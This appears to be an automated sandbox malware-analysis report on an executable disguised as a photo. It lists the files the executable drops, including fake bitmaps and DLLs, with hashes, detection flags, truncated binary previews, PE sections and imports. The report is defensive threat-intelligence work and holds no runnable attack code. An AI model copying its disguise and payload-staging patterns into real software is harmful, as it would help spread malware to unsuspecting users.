                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Program Files (x86)\EjXjKxze\MSVCP140.dll3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                          3Kel6xErOk.exeGet hashmaliciousNitolBrowse
                            8CoDx513sS.exeGet hashmaliciousNitolBrowse
                              3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                                N6xnw0iEGs.exeGet hashmaliciousGhostRatBrowse
                                  nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                    pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                                      Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                                        nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                          https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                                            C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                                              3Kel6xErOk.exeGet hashmaliciousNitolBrowse
                                                8CoDx513sS.exeGet hashmaliciousNitolBrowse
                                                  3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                                                    N6xnw0iEGs.exeGet hashmaliciousGhostRatBrowse
                                                      nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                                        pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                                                          Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                                                            nOyswc9ly2.dllGet hashmaliciousUnknownBrowse

                                                              Created / dropped Files

                                                              C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):6453568
                                                              Entropy (8bit):7.944493660771585
                                                              Encrypted:false
                                                              SSDEEP:196608:fW1Hje3HvntQwZSPyl7N6nds1HhmwcOaXr:myvtrxBL1QSaXr
                                                              MD5:C8E8EEAF5464AF1A188B3DC12C890813
                                                              SHA1:2DF041366B9DE8A2B982205B15F7264145E81644
                                                              SHA-256:E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                                                              SHA-512:8119BD5A7FE790F1EBF1B2C5411264C32A193718851746C26183B8A48293D61E8F9F3EEB97CC851A419B5B41038BC63BFFD17E99907AD4F8CDEE63F7151DBE46
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse
                                                              • Filename: 3Kel6xErOk.exe, Detection: malicious, Browse
                                                              • Filename: 8CoDx513sS.exe, Detection: malicious, Browse
                                                              • Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse
                                                              • Filename: N6xnw0iEGs.exe, Detection: malicious, Browse
                                                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                                              • Filename: pXm5oVO3Go.exe, Detection: malicious, Browse
                                                              • Filename: Rudvfa0Z17.exe, Detection: malicious, Browse
                                                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...............'..?.................0?...@..........................@.......kc.....................................`........0..u............Pb.@)..................................d.}.........@.............{..............................text...R.?......................... ..`.rdata.......0?.....................@..@.data...T.....H.....................@....idata...Q....J.....................@..@.tls......... K.....................@....00cfg.......0K.....................@..@.ubx0...z....@K.....................`..`.ubx1...`A_...y..B_.................`..`.rsrc...u....0.......J_.............@..@........................................................................................................................................................................................................................................................................

                                                              C:\Program Files (x86)\EjXjKxze\MSVCP140.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):436600
                                                              Entropy (8bit):6.647460578716755
                                                              Encrypted:false
                                                              SSDEEP:12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
                                                              MD5:C092885EA11BD80D35CB55C7D488F1E2
                                                              SHA1:BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
                                                              SHA-256:885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                                                              SHA-512:8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse
                                                              • Filename: 3Kel6xErOk.exe, Detection: malicious, Browse
                                                              • Filename: 8CoDx513sS.exe, Detection: malicious, Browse
                                                              • Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse
                                                              • Filename: N6xnw0iEGs.exe, Detection: malicious, Browse
                                                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                                              • Filename: pXm5oVO3Go.exe, Detection: malicious, Browse
                                                              • Filename: Rudvfa0Z17.exe, Detection: malicious, Browse
                                                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                                              • Filename: , Detection: malicious, Browse
                                                              Reputation:moderate, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................

                                                              C:\Program Files (x86)\EjXjKxze\VCRUNTIME140.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):79792
                                                              Entropy (8bit):6.778797048504205
                                                              Encrypted:false
                                                              SSDEEP:1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
                                                              MD5:9D5A742F221C4929A178BAF2B93FC7FB
                                                              SHA1:928C9E0E1C18EC474C2F450CA00A154E44AC547A
                                                              SHA-256:F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                                                              SHA-512:F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

                                                              C:\Program Files (x86)\EjXjKxze\libcef.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):524288000
                                                              Entropy (8bit):0.03653807744214944
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:A497F0BEE04EE4D4F7BEBDACB139C9DA
                                                              SHA1:78A06BC3690509016D7285D3E76D2CFD4E945B56
                                                              SHA-256:7326A18775A980FDE53F0E0B5C3003A58AB4C6C08B129FA453510425D88A6558
                                                              SHA-512:0EA1AA71364C1DAA7A29BB400AC38A9C8ABC584D96B82860C4B62F37BA65FE138E4A8380B2890635E52BA757F9EF6E4E97504D64B7401BAA82B49BBB8FAB9240
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..........4.......!..........)......9.......c.........1.....0.....7....Rich...........PE..L....@.f...........!.........0......$].......................................0............@.........................pI......t6.......0..X....................@..l...................................X(..@............................................text...!........................... ..`.rdata..Z...........................@..@.data.......p.......T..............@....rsrc...X....0......................@..@.reloc..V....@......................@..B........................................................................................................................................................................................................................................................................................................................

                                                              C:\Program Files (x86)\EjXjKxze\t3d.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                              Category:dropped
                                                              Size (bytes):6443425
                                                              Entropy (8bit):7.999970882342927
                                                              Encrypted:true
                                                              SSDEEP:98304:7c5bWQVHWXS1k+CxcfLg3LFvsI0i/2tEn+ynekhscRZ+Q3FqFoJSnerSgkogC6qz:7c5FNB7WRjsUZn5h/+e7Vkokqg8iEHCu
                                                              MD5:FB936CD4F33E5AE9AB88D7AE21B8D654
                                                              SHA1:157DF7F219BB272F2DC56B3AA0BD5CE70E4902DA
                                                              SHA-256:3C55279D70BBAAA18DCA653DD5922BEAE2F720B8285D6A195A21961DE005BCF2
                                                              SHA-512:F72254B4CE87CAAFA12DD2DDEEC7B77DABEE2FC052E3CA102E55C5ABCC7F99FD4EE6A8544F5942D2A75EDF66C406CB20A0978E9E378055B79EFFB820094AADC1
                                                              Malicious:false
                                                              Preview:PK........R..Y................text/UT....1.f.1.f.1.fPK..........7X........x.......text/MSVCP140.dllUT.....ej..f2M.f.z.0I\pq...7....N...y..A....L.:.v.FF.e}.F."..._.....hI.g....M_.....]..x..h.\....xh...=X....R. .....W2O#-.u..-sZ.%.ST..=.{...3W>...h./.(...nL..&.+~.^BY..<..:.T..k......jq.[...n.T..{h....../c..iAj..+..|..|.x\.:L.S...C.@r..M.u....`%..fJK].^.;$)...(.H.$...W1;c..9;fLF.....h..!=|.z..<.2..A ..<.=T.(.t-....j.K<.z>.Uu.....>a..".-,7.*\.Q.k...'#.....P....G.[H;*...}.h........}.i..x...!sVN.8....G.&_#...]J...._g]..G....,f.RJ...U/...w.d.........v.-........!.A=\\Un.....f....5c`7.[..t.:..J1.../HV.%..6I....I....B.e.j.".....>...($....|:.Wb..wAx.*......B.MX}b.p..k.05.5^%.w.C.... ua}.......*:..?u...!j[..0;!...Bi..d..i.F.2T..2.....m..gC.}.R....2.J...7.J$u)...#oo.DD...$..P.OTzy.D.F..S5.)i.*.*.....A\....]..t...P4..R..;O..._k.F..@..1......j.a.."..<...V.m....je...I*....lO.........|sl.".J..X..l8C..xqR."e.yt`.6.o8!.E...#.uA.S../..Vh...q...Q....*.4JN^...;Q..v

                                                              C:\Program Files (x86)\EjXjKxze\t4d.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):1236598
                                                              Entropy (8bit):7.382378338793816
                                                              Encrypted:false
                                                              SSDEEP:24576:CXptT9TEpaNPwRTOMcEBe0rOZsdEjQGOeK+GKe66/uV:CZXFNoRk10aZsWjQIBGT
                                                              MD5:DAE17C69D8F4A253C008A4EC7CF45D9F
                                                              SHA1:A3B99D5CAF55F9CA22E79AABF1AFA6CC9FFC80EC
                                                              SHA-256:6DB78BD2576F2023F09775B0968EB9F83BB78B8575808402CD06D985BE3D0161
                                                              SHA-512:AC54F2E31B25EEFCC5C690AC1A30D13489590D92AA25962B51CDC59E9B0E1490F7C994B5F1202C7922DFBAFEDAD4030137980FC05CF1515B8BE18ABED04173D1
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g.......i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g......A...........4........F..........).....9...................1......0......7....5ach...g...g...7M..+....H.fg...g......!l...g...g8..g...CU..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w....A.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g...? ..'...g...g...g.......g...g...g...g...g...g...I|ex....F...g...g...g...g...g...g...G..`Izda.i..=...g...g...g...g...g...g...'..@Ilat........gx..g...g\..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k..1...gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.

                                                              C:\Program Files (x86)\EjXjKxze\t5d.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):2473
                                                              Entropy (8bit):6.79774619487747
                                                              Encrypted:false
                                                              SSDEEP:48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRzcaVoW+9H:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1Hv
                                                              MD5:96737B2D4782953CC18FCA4618C75296
                                                              SHA1:9E3355ED538E2BA99F07C6B5A226E0ADF9E1E482
                                                              SHA-256:CC24BAEF9B8557E30276D342E488ABA1022C179C1CDA3338ED49D934543B0E86
                                                              SHA-512:9E1BEC72622ABC1FCF1A950A4E3058EFA5992AA1284E7C37CE72C7D9D19BEA86A967B99C7BC37D4FA1C27C448760654C88EB9D935688428D4DCB11481F8A7A58
                                                              Malicious:false
                                                              Preview:BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh...*....g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}*....d.+.|f.eu{.|.cku..t...}.....d...|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$|.$.g....(P.3,<.#,|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$|.$.g....$P.3,<.#,|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....|$0.L$T..\.1...g..tC0.DChhI.>.....|$@.L$l.$..e...g..tC@.DCphj.._......|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\lon2[1].bmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):137736
                                                              Entropy (8bit):6.877634474527615
                                                              Encrypted:false
                                                              SSDEEP:1536:wsgl4UjP9t6W9AtyRB1xKNrt7eHsYnBvNk3CIsrNSbgskHW1ICZqktlZCVXTys:wPpPiW911i8Hv5b4gzAI2TlZCVV
                                                              MD5:963DE884811BA2CC8280FCB628E7F146
                                                              SHA1:BA07A9F0C683074EEE5879719E4FDC66CACB66E9
                                                              SHA-256:CC066832EC328A85AF57DE9C85C001B74141D8E99E4B2DA1D32DAE46D738D5B1
                                                              SHA-512:3EDC81DE22438A34CEF8053D7F41DDB959A0A2ADFBC98C063740FDC5CBC790CF00716D7DC592E67BEE33D5B552707C4CD360DB174B9FD99E79D09C3EC4BAC9FC
                                                              Malicious:false
                                                              Preview:.l..l4U......g.....nlh.ll.hhl..>....P.il........ml.S9:Wj.4je..$.l.._.Xj.5jn7.lZ._f..H..llf..H..llXj^...H...l4j...$.l..4.df..$.ll.X..$.ll...H4..H..ll..H...l.$.l....$.ll...H..llf..H..llf..H..llf..H..llf..H..llf..H..llf..H..ll.DHPS.8H=f.($>...DH,pf.($P ..DH>a.(HSf.($T ..DH:b. HW.(HXa. $Y..D$6.Af.($D:..LH*f.(HGt..D$%..TH&.DH'A.8HL.8HMf.($N..f.(H\V..L$2..DH3tu.($a..T$..D$.<.LH..DH.ot...DH.t..H..llF..H..ll.H...l.sh%.$.l.....$.l......H...l..$.l....ti..$.ll.o..Y..H..ll.LH..LH..LH...H...l......H...l..$.l../.ch.($l+.D$..Na...DH.iv.($u?.st..D$..I.0H|f.($}..f..H..llRt..$.ll...H..llA..H..ll..H...l..H...l*u..H..ll.H...l.ti..$.l.....$.l..8..H...l...H...l.w.ll..-.^...k.ll....$.ll.jt.$.l..4...H...l...H...l.D$p<..H...l.\$X<UU..j.3.D$(..|Hx.DHt.DHXPU.($...|$r<.tHD...bXf.($...D$z.D$0.D$t.$.l..<9.DHpP..H(....X..D$x..DHz..H...l.D$t.$.l..<9.DHpP..H(....^.($l..t$x.D$t.$.l..<9.DHpf..H.P..$(..j.4..DHxf.(H..(H<.(H...H..llPU.($.<.t$D...H..llf..H..(H...H..llPU.($...t$r<.tHD...($P..|$x.D$t.$.l..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.67322098448743
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:photo_2024-09-18_20-00-20.exe
                                                              File size:2'957'312 bytes
                                                              MD5:e054e331caed0e50fc56f6b548fd10c5
                                                              SHA1:a56178e3a84e48f7ab6482db08b52d05837dec59
                                                              SHA256:b2a3aaf4eb4deb85462e1ee39c84caf2830091c1bff8014ad13147897b25e24c
                                                              SHA512:e12d07112200b0b6cadf87f51a9eacc15dcadc39d7b31bdb0d289439b56178802c9992c4d1f2a14fe1ae894e8d90e76d0fdc1cdc8559a8e974089ea2335bc9f5
                                                              SSDEEP:49152:6hwzszpJ1jSPXxOBWouoDtOZBsx+pMR6JiDrOp/WfHMu6/dW+O/jchwW:A6stJ1jS/xYWat4e+JJiv6gH61
                                                              TLSH:CCD5CF43BB928072D866167941FB637F99F9AE20C324C5D383D03D592C746D1AA3A37B
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I...I...I.......I...?...I...? .HI...1...I...?!..I.......K...I..BH...1...I...?%..I...?...I...?...I..Rich.I.................

                                                              File Icon

                                                              Icon Hash:0e06060b2f734313

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x48e9ce
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x65365338 [Mon Oct 23 11:04:24 2023 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:d0e0ea0d759beaf789db6a3af9913b81

                                                              Entrypoint Preview

                                                              Instruction
                                                              call 00007FC8D94DFF28h
                                                              jmp 00007FC8D94CEC8Eh
                                                              mov edi, edi
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 10h
                                                              push ebx
                                                              push dword ptr [ebp+10h]
                                                              lea ecx, dword ptr [ebp-10h]
                                                              call 00007FC8D94CDB23h
                                                              mov ebx, dword ptr [ebp+08h]
                                                              test ebx, ebx
                                                              jne 00007FC8D94CEE28h
                                                              call 00007FC8D94CE09Dh
                                                              mov dword ptr [eax], 00000016h
                                                              call 00007FC8D94D59B8h
                                                              cmp byte ptr [ebp-04h], bl
                                                              je 00007FC8D94CEE09h
                                                              mov eax, dword ptr [ebp-08h]
                                                              and dword ptr [eax+70h], FFFFFFFDh
                                                              mov eax, 7FFFFFFFh
                                                              jmp 00007FC8D94CEEC4h
                                                              push edi
                                                              mov edi, dword ptr [ebp+0Ch]
                                                              test edi, edi
                                                              jne 00007FC8D94CEE29h
                                                              call 00007FC8D94CE06Fh
                                                              mov dword ptr [eax], 00000016h
                                                              call 00007FC8D94D598Ah
                                                              cmp byte ptr [ebp-04h], 00000000h
                                                              je 00007FC8D94CEE09h
                                                              mov eax, dword ptr [ebp-08h]
                                                              and dword ptr [eax+70h], FFFFFFFDh
                                                              mov eax, 7FFFFFFFh
                                                              jmp 00007FC8D94CEE94h
                                                              mov eax, dword ptr [ebp-10h]
                                                              cmp dword ptr [eax+14h], 00000000h
                                                              push esi
                                                              jne 00007FC8D94CEE3Eh
                                                              sub ebx, edi
                                                              movzx eax, word ptr [ebx+edi]
                                                              cmp eax, 41h
                                                              jc 00007FC8D94CEE0Fh
                                                              cmp eax, 5Ah
                                                              jnbe 00007FC8D94CEE0Ah
                                                              add eax, 20h
                                                              movzx esi, ax
                                                              jmp 00007FC8D94CEE04h
                                                              mov esi, eax
                                                              movzx eax, word ptr [edi]
                                                              cmp eax, 41h
                                                              jc 00007FC8D94CEE0Dh
                                                              cmp eax, 5Ah
                                                              jnbe 00007FC8D94CEE08h
                                                              add eax, 20h
                                                              movzx eax, ax
                                                              add edi, 02h
                                                              test si, si
                                                              je 00007FC8D94CEE3Ch
                                                              cmp si, ax
                                                              je 00007FC8D94CEDCAh
                                                              jmp 00007FC8D94CEE35h
                                                              movzx eax, word ptr [ebx]
                                                              lea ecx, dword ptr [ebp-10h]
                                                              push ecx

                                                              Rich Headers

                                                              Programming Language:
                                                              • [ASM] VS2010 build 30319
                                                              • [ C ] VS2010 build 30319
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [C++] VS2010 build 30319
                                                              • [ C ] VS2005 build 50727
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [RES] VS2010 build 30319
                                                              • [LNK] VS2010 build 30319

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x21b9d40x168.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2370000x857dc.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2bd0000x1a0ec.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1ad8f00x1c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x20b7400x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1ad0000x680.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x1abee70x1ac000aa45d64a51e150126ee011d26b2abc85False0.5216104382666472data6.660409931927715IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x1ad0000x70aec0x70c004e6a94c9b881226837a8ed6104f25daaFalse0.4039266040742794data5.7462227457659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x21e0000x183fc0x10c005755c18001c6788410b27c5f35492bbdFalse0.3499883395522388data4.314593792288919IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x2370000x857dc0x858004e7c92d006a679cd0b7d6b84356bf4acFalse0.4881971266385768data6.2888641089671715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x2bd0000x1ebd20x1ec00fc42cbd30196364b2cd8af84bdf59d80False0.4995474466463415data6.159637098881428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              ZIPRES0x2372c00x2e35aZip archive data, at least v2.0 to extract, compression method=deflateChineseChina0.988397772541395
                                                              RT_ICON0x26561c0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336ChineseChina0.16596887297689145
                                                              RT_ICON0x2a76440x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.33977581923577427
                                                              RT_ICON0x2b7e6c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.537551867219917
                                                              RT_ICON0x2ba4140x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.5907598499061913
                                                              RT_ICON0x2bb4bc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.6561475409836065
                                                              RT_ICON0x2bbe440x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.7322695035460993
                                                              RT_STRING0x2bc2ac0x2cTarga image data - Map 23433 x 35013 x 24 +48 +4 - 2-bit alpha - top - interleaveChineseChina0.6136363636363636
                                                              RT_GROUP_ICON0x2bc2d80x5adataChineseChina0.7777777777777778
                                                              RT_VERSION0x2bc3340x22cdataChineseChina0.5467625899280576
                                                              RT_MANIFEST0x2bc5600x279ASCII text, with CRLF line terminatorsChineseChina0.5197472353870458

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.dllMoveFileExW, RemoveDirectoryW, GetFileAttributesW, SetFileAttributesW, WriteConsoleW, GetStdHandle, OutputDebugStringW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, ReleaseSemaphore, TerminateThread, GetExitCodeThread, SetFilePointerEx, FlushFileBuffers, SetEndOfFile, FreeLibrary, HeapAlloc, GetProcessHeap, HeapFree, GetSystemTimeAsFileTime, QueryPerformanceFrequency, CreateEventW, SetConsoleMode, ReadConsoleInputA, GetCurrentProcessId, WaitForSingleObject, DeleteFileW, GetSystemTime, FlushConsoleInputBuffer, GlobalMemoryStatus, GetVersion, GetFullPathNameA, GetFileInformationByHandle, FindFirstFileExA, GetDriveTypeA, FileTimeToLocalFileTime, FileTimeToSystemTime, GetModuleHandleA, GetVersionExA, FindResourceW, PeekNamedPipe, FormatMessageA, GetSystemDirectoryA, WritePrivateProfileStringW, SleepEx, GetDiskFreeSpaceExW, CompareStringW, CreateFileA, SetStdHandle, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, IsValidCodePage, GetOEMCP, GetConsoleMode, GetConsoleCP, HeapCreate, SetHandleCount, HeapSize, SetLastError, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetLocaleInfoW, SetConsoleCtrlHandler, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCPInfo, LCMapStringW, RtlUnwind, RaiseException, GetDateFormatW, GetTimeFormatW, GetTimeZoneInformation, HeapReAlloc, GetStartupInfoW, HeapSetInformation, GetCommandLineW, CreateThread, ExitThread, LocalFree, DecodePointer, EncodePointer, InterlockedExchange, WaitForMultipleObjects, TerminateProcess, OpenProcess, CreateProcessW, GetDriveTypeW, SizeofResource, LockResource, LoadResource, GetPrivateProfileStringW, CloseHandle, ReleaseMutex, QueryPerformanceCounter, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, VerifyVersionInfoW, VerSetConditionMask, GetLocalTime, MulDiv, InterlockedIncrement, InterlockedDecrement, DuplicateHandle, GetFileType, WideCharToMultiByte, WriteFile, SystemTimeToFileTime, SetFilePointer, DosDateTimeToFileTime, ReadFile, GetFileSize, CreateFileW, GetACP, GetProcAddress, GetCurrentDirectoryW, LoadLibraryW, ExitProcess, FreeResource, GetModuleHandleW, FindNextFileW, GetCurrentThreadId, GetModuleFileNameW, FindClose, FindFirstFileW, GetCurrentProcess, GetVersionExW, GetSystemInfo, CreateDirectoryW, MultiByteToWideChar, 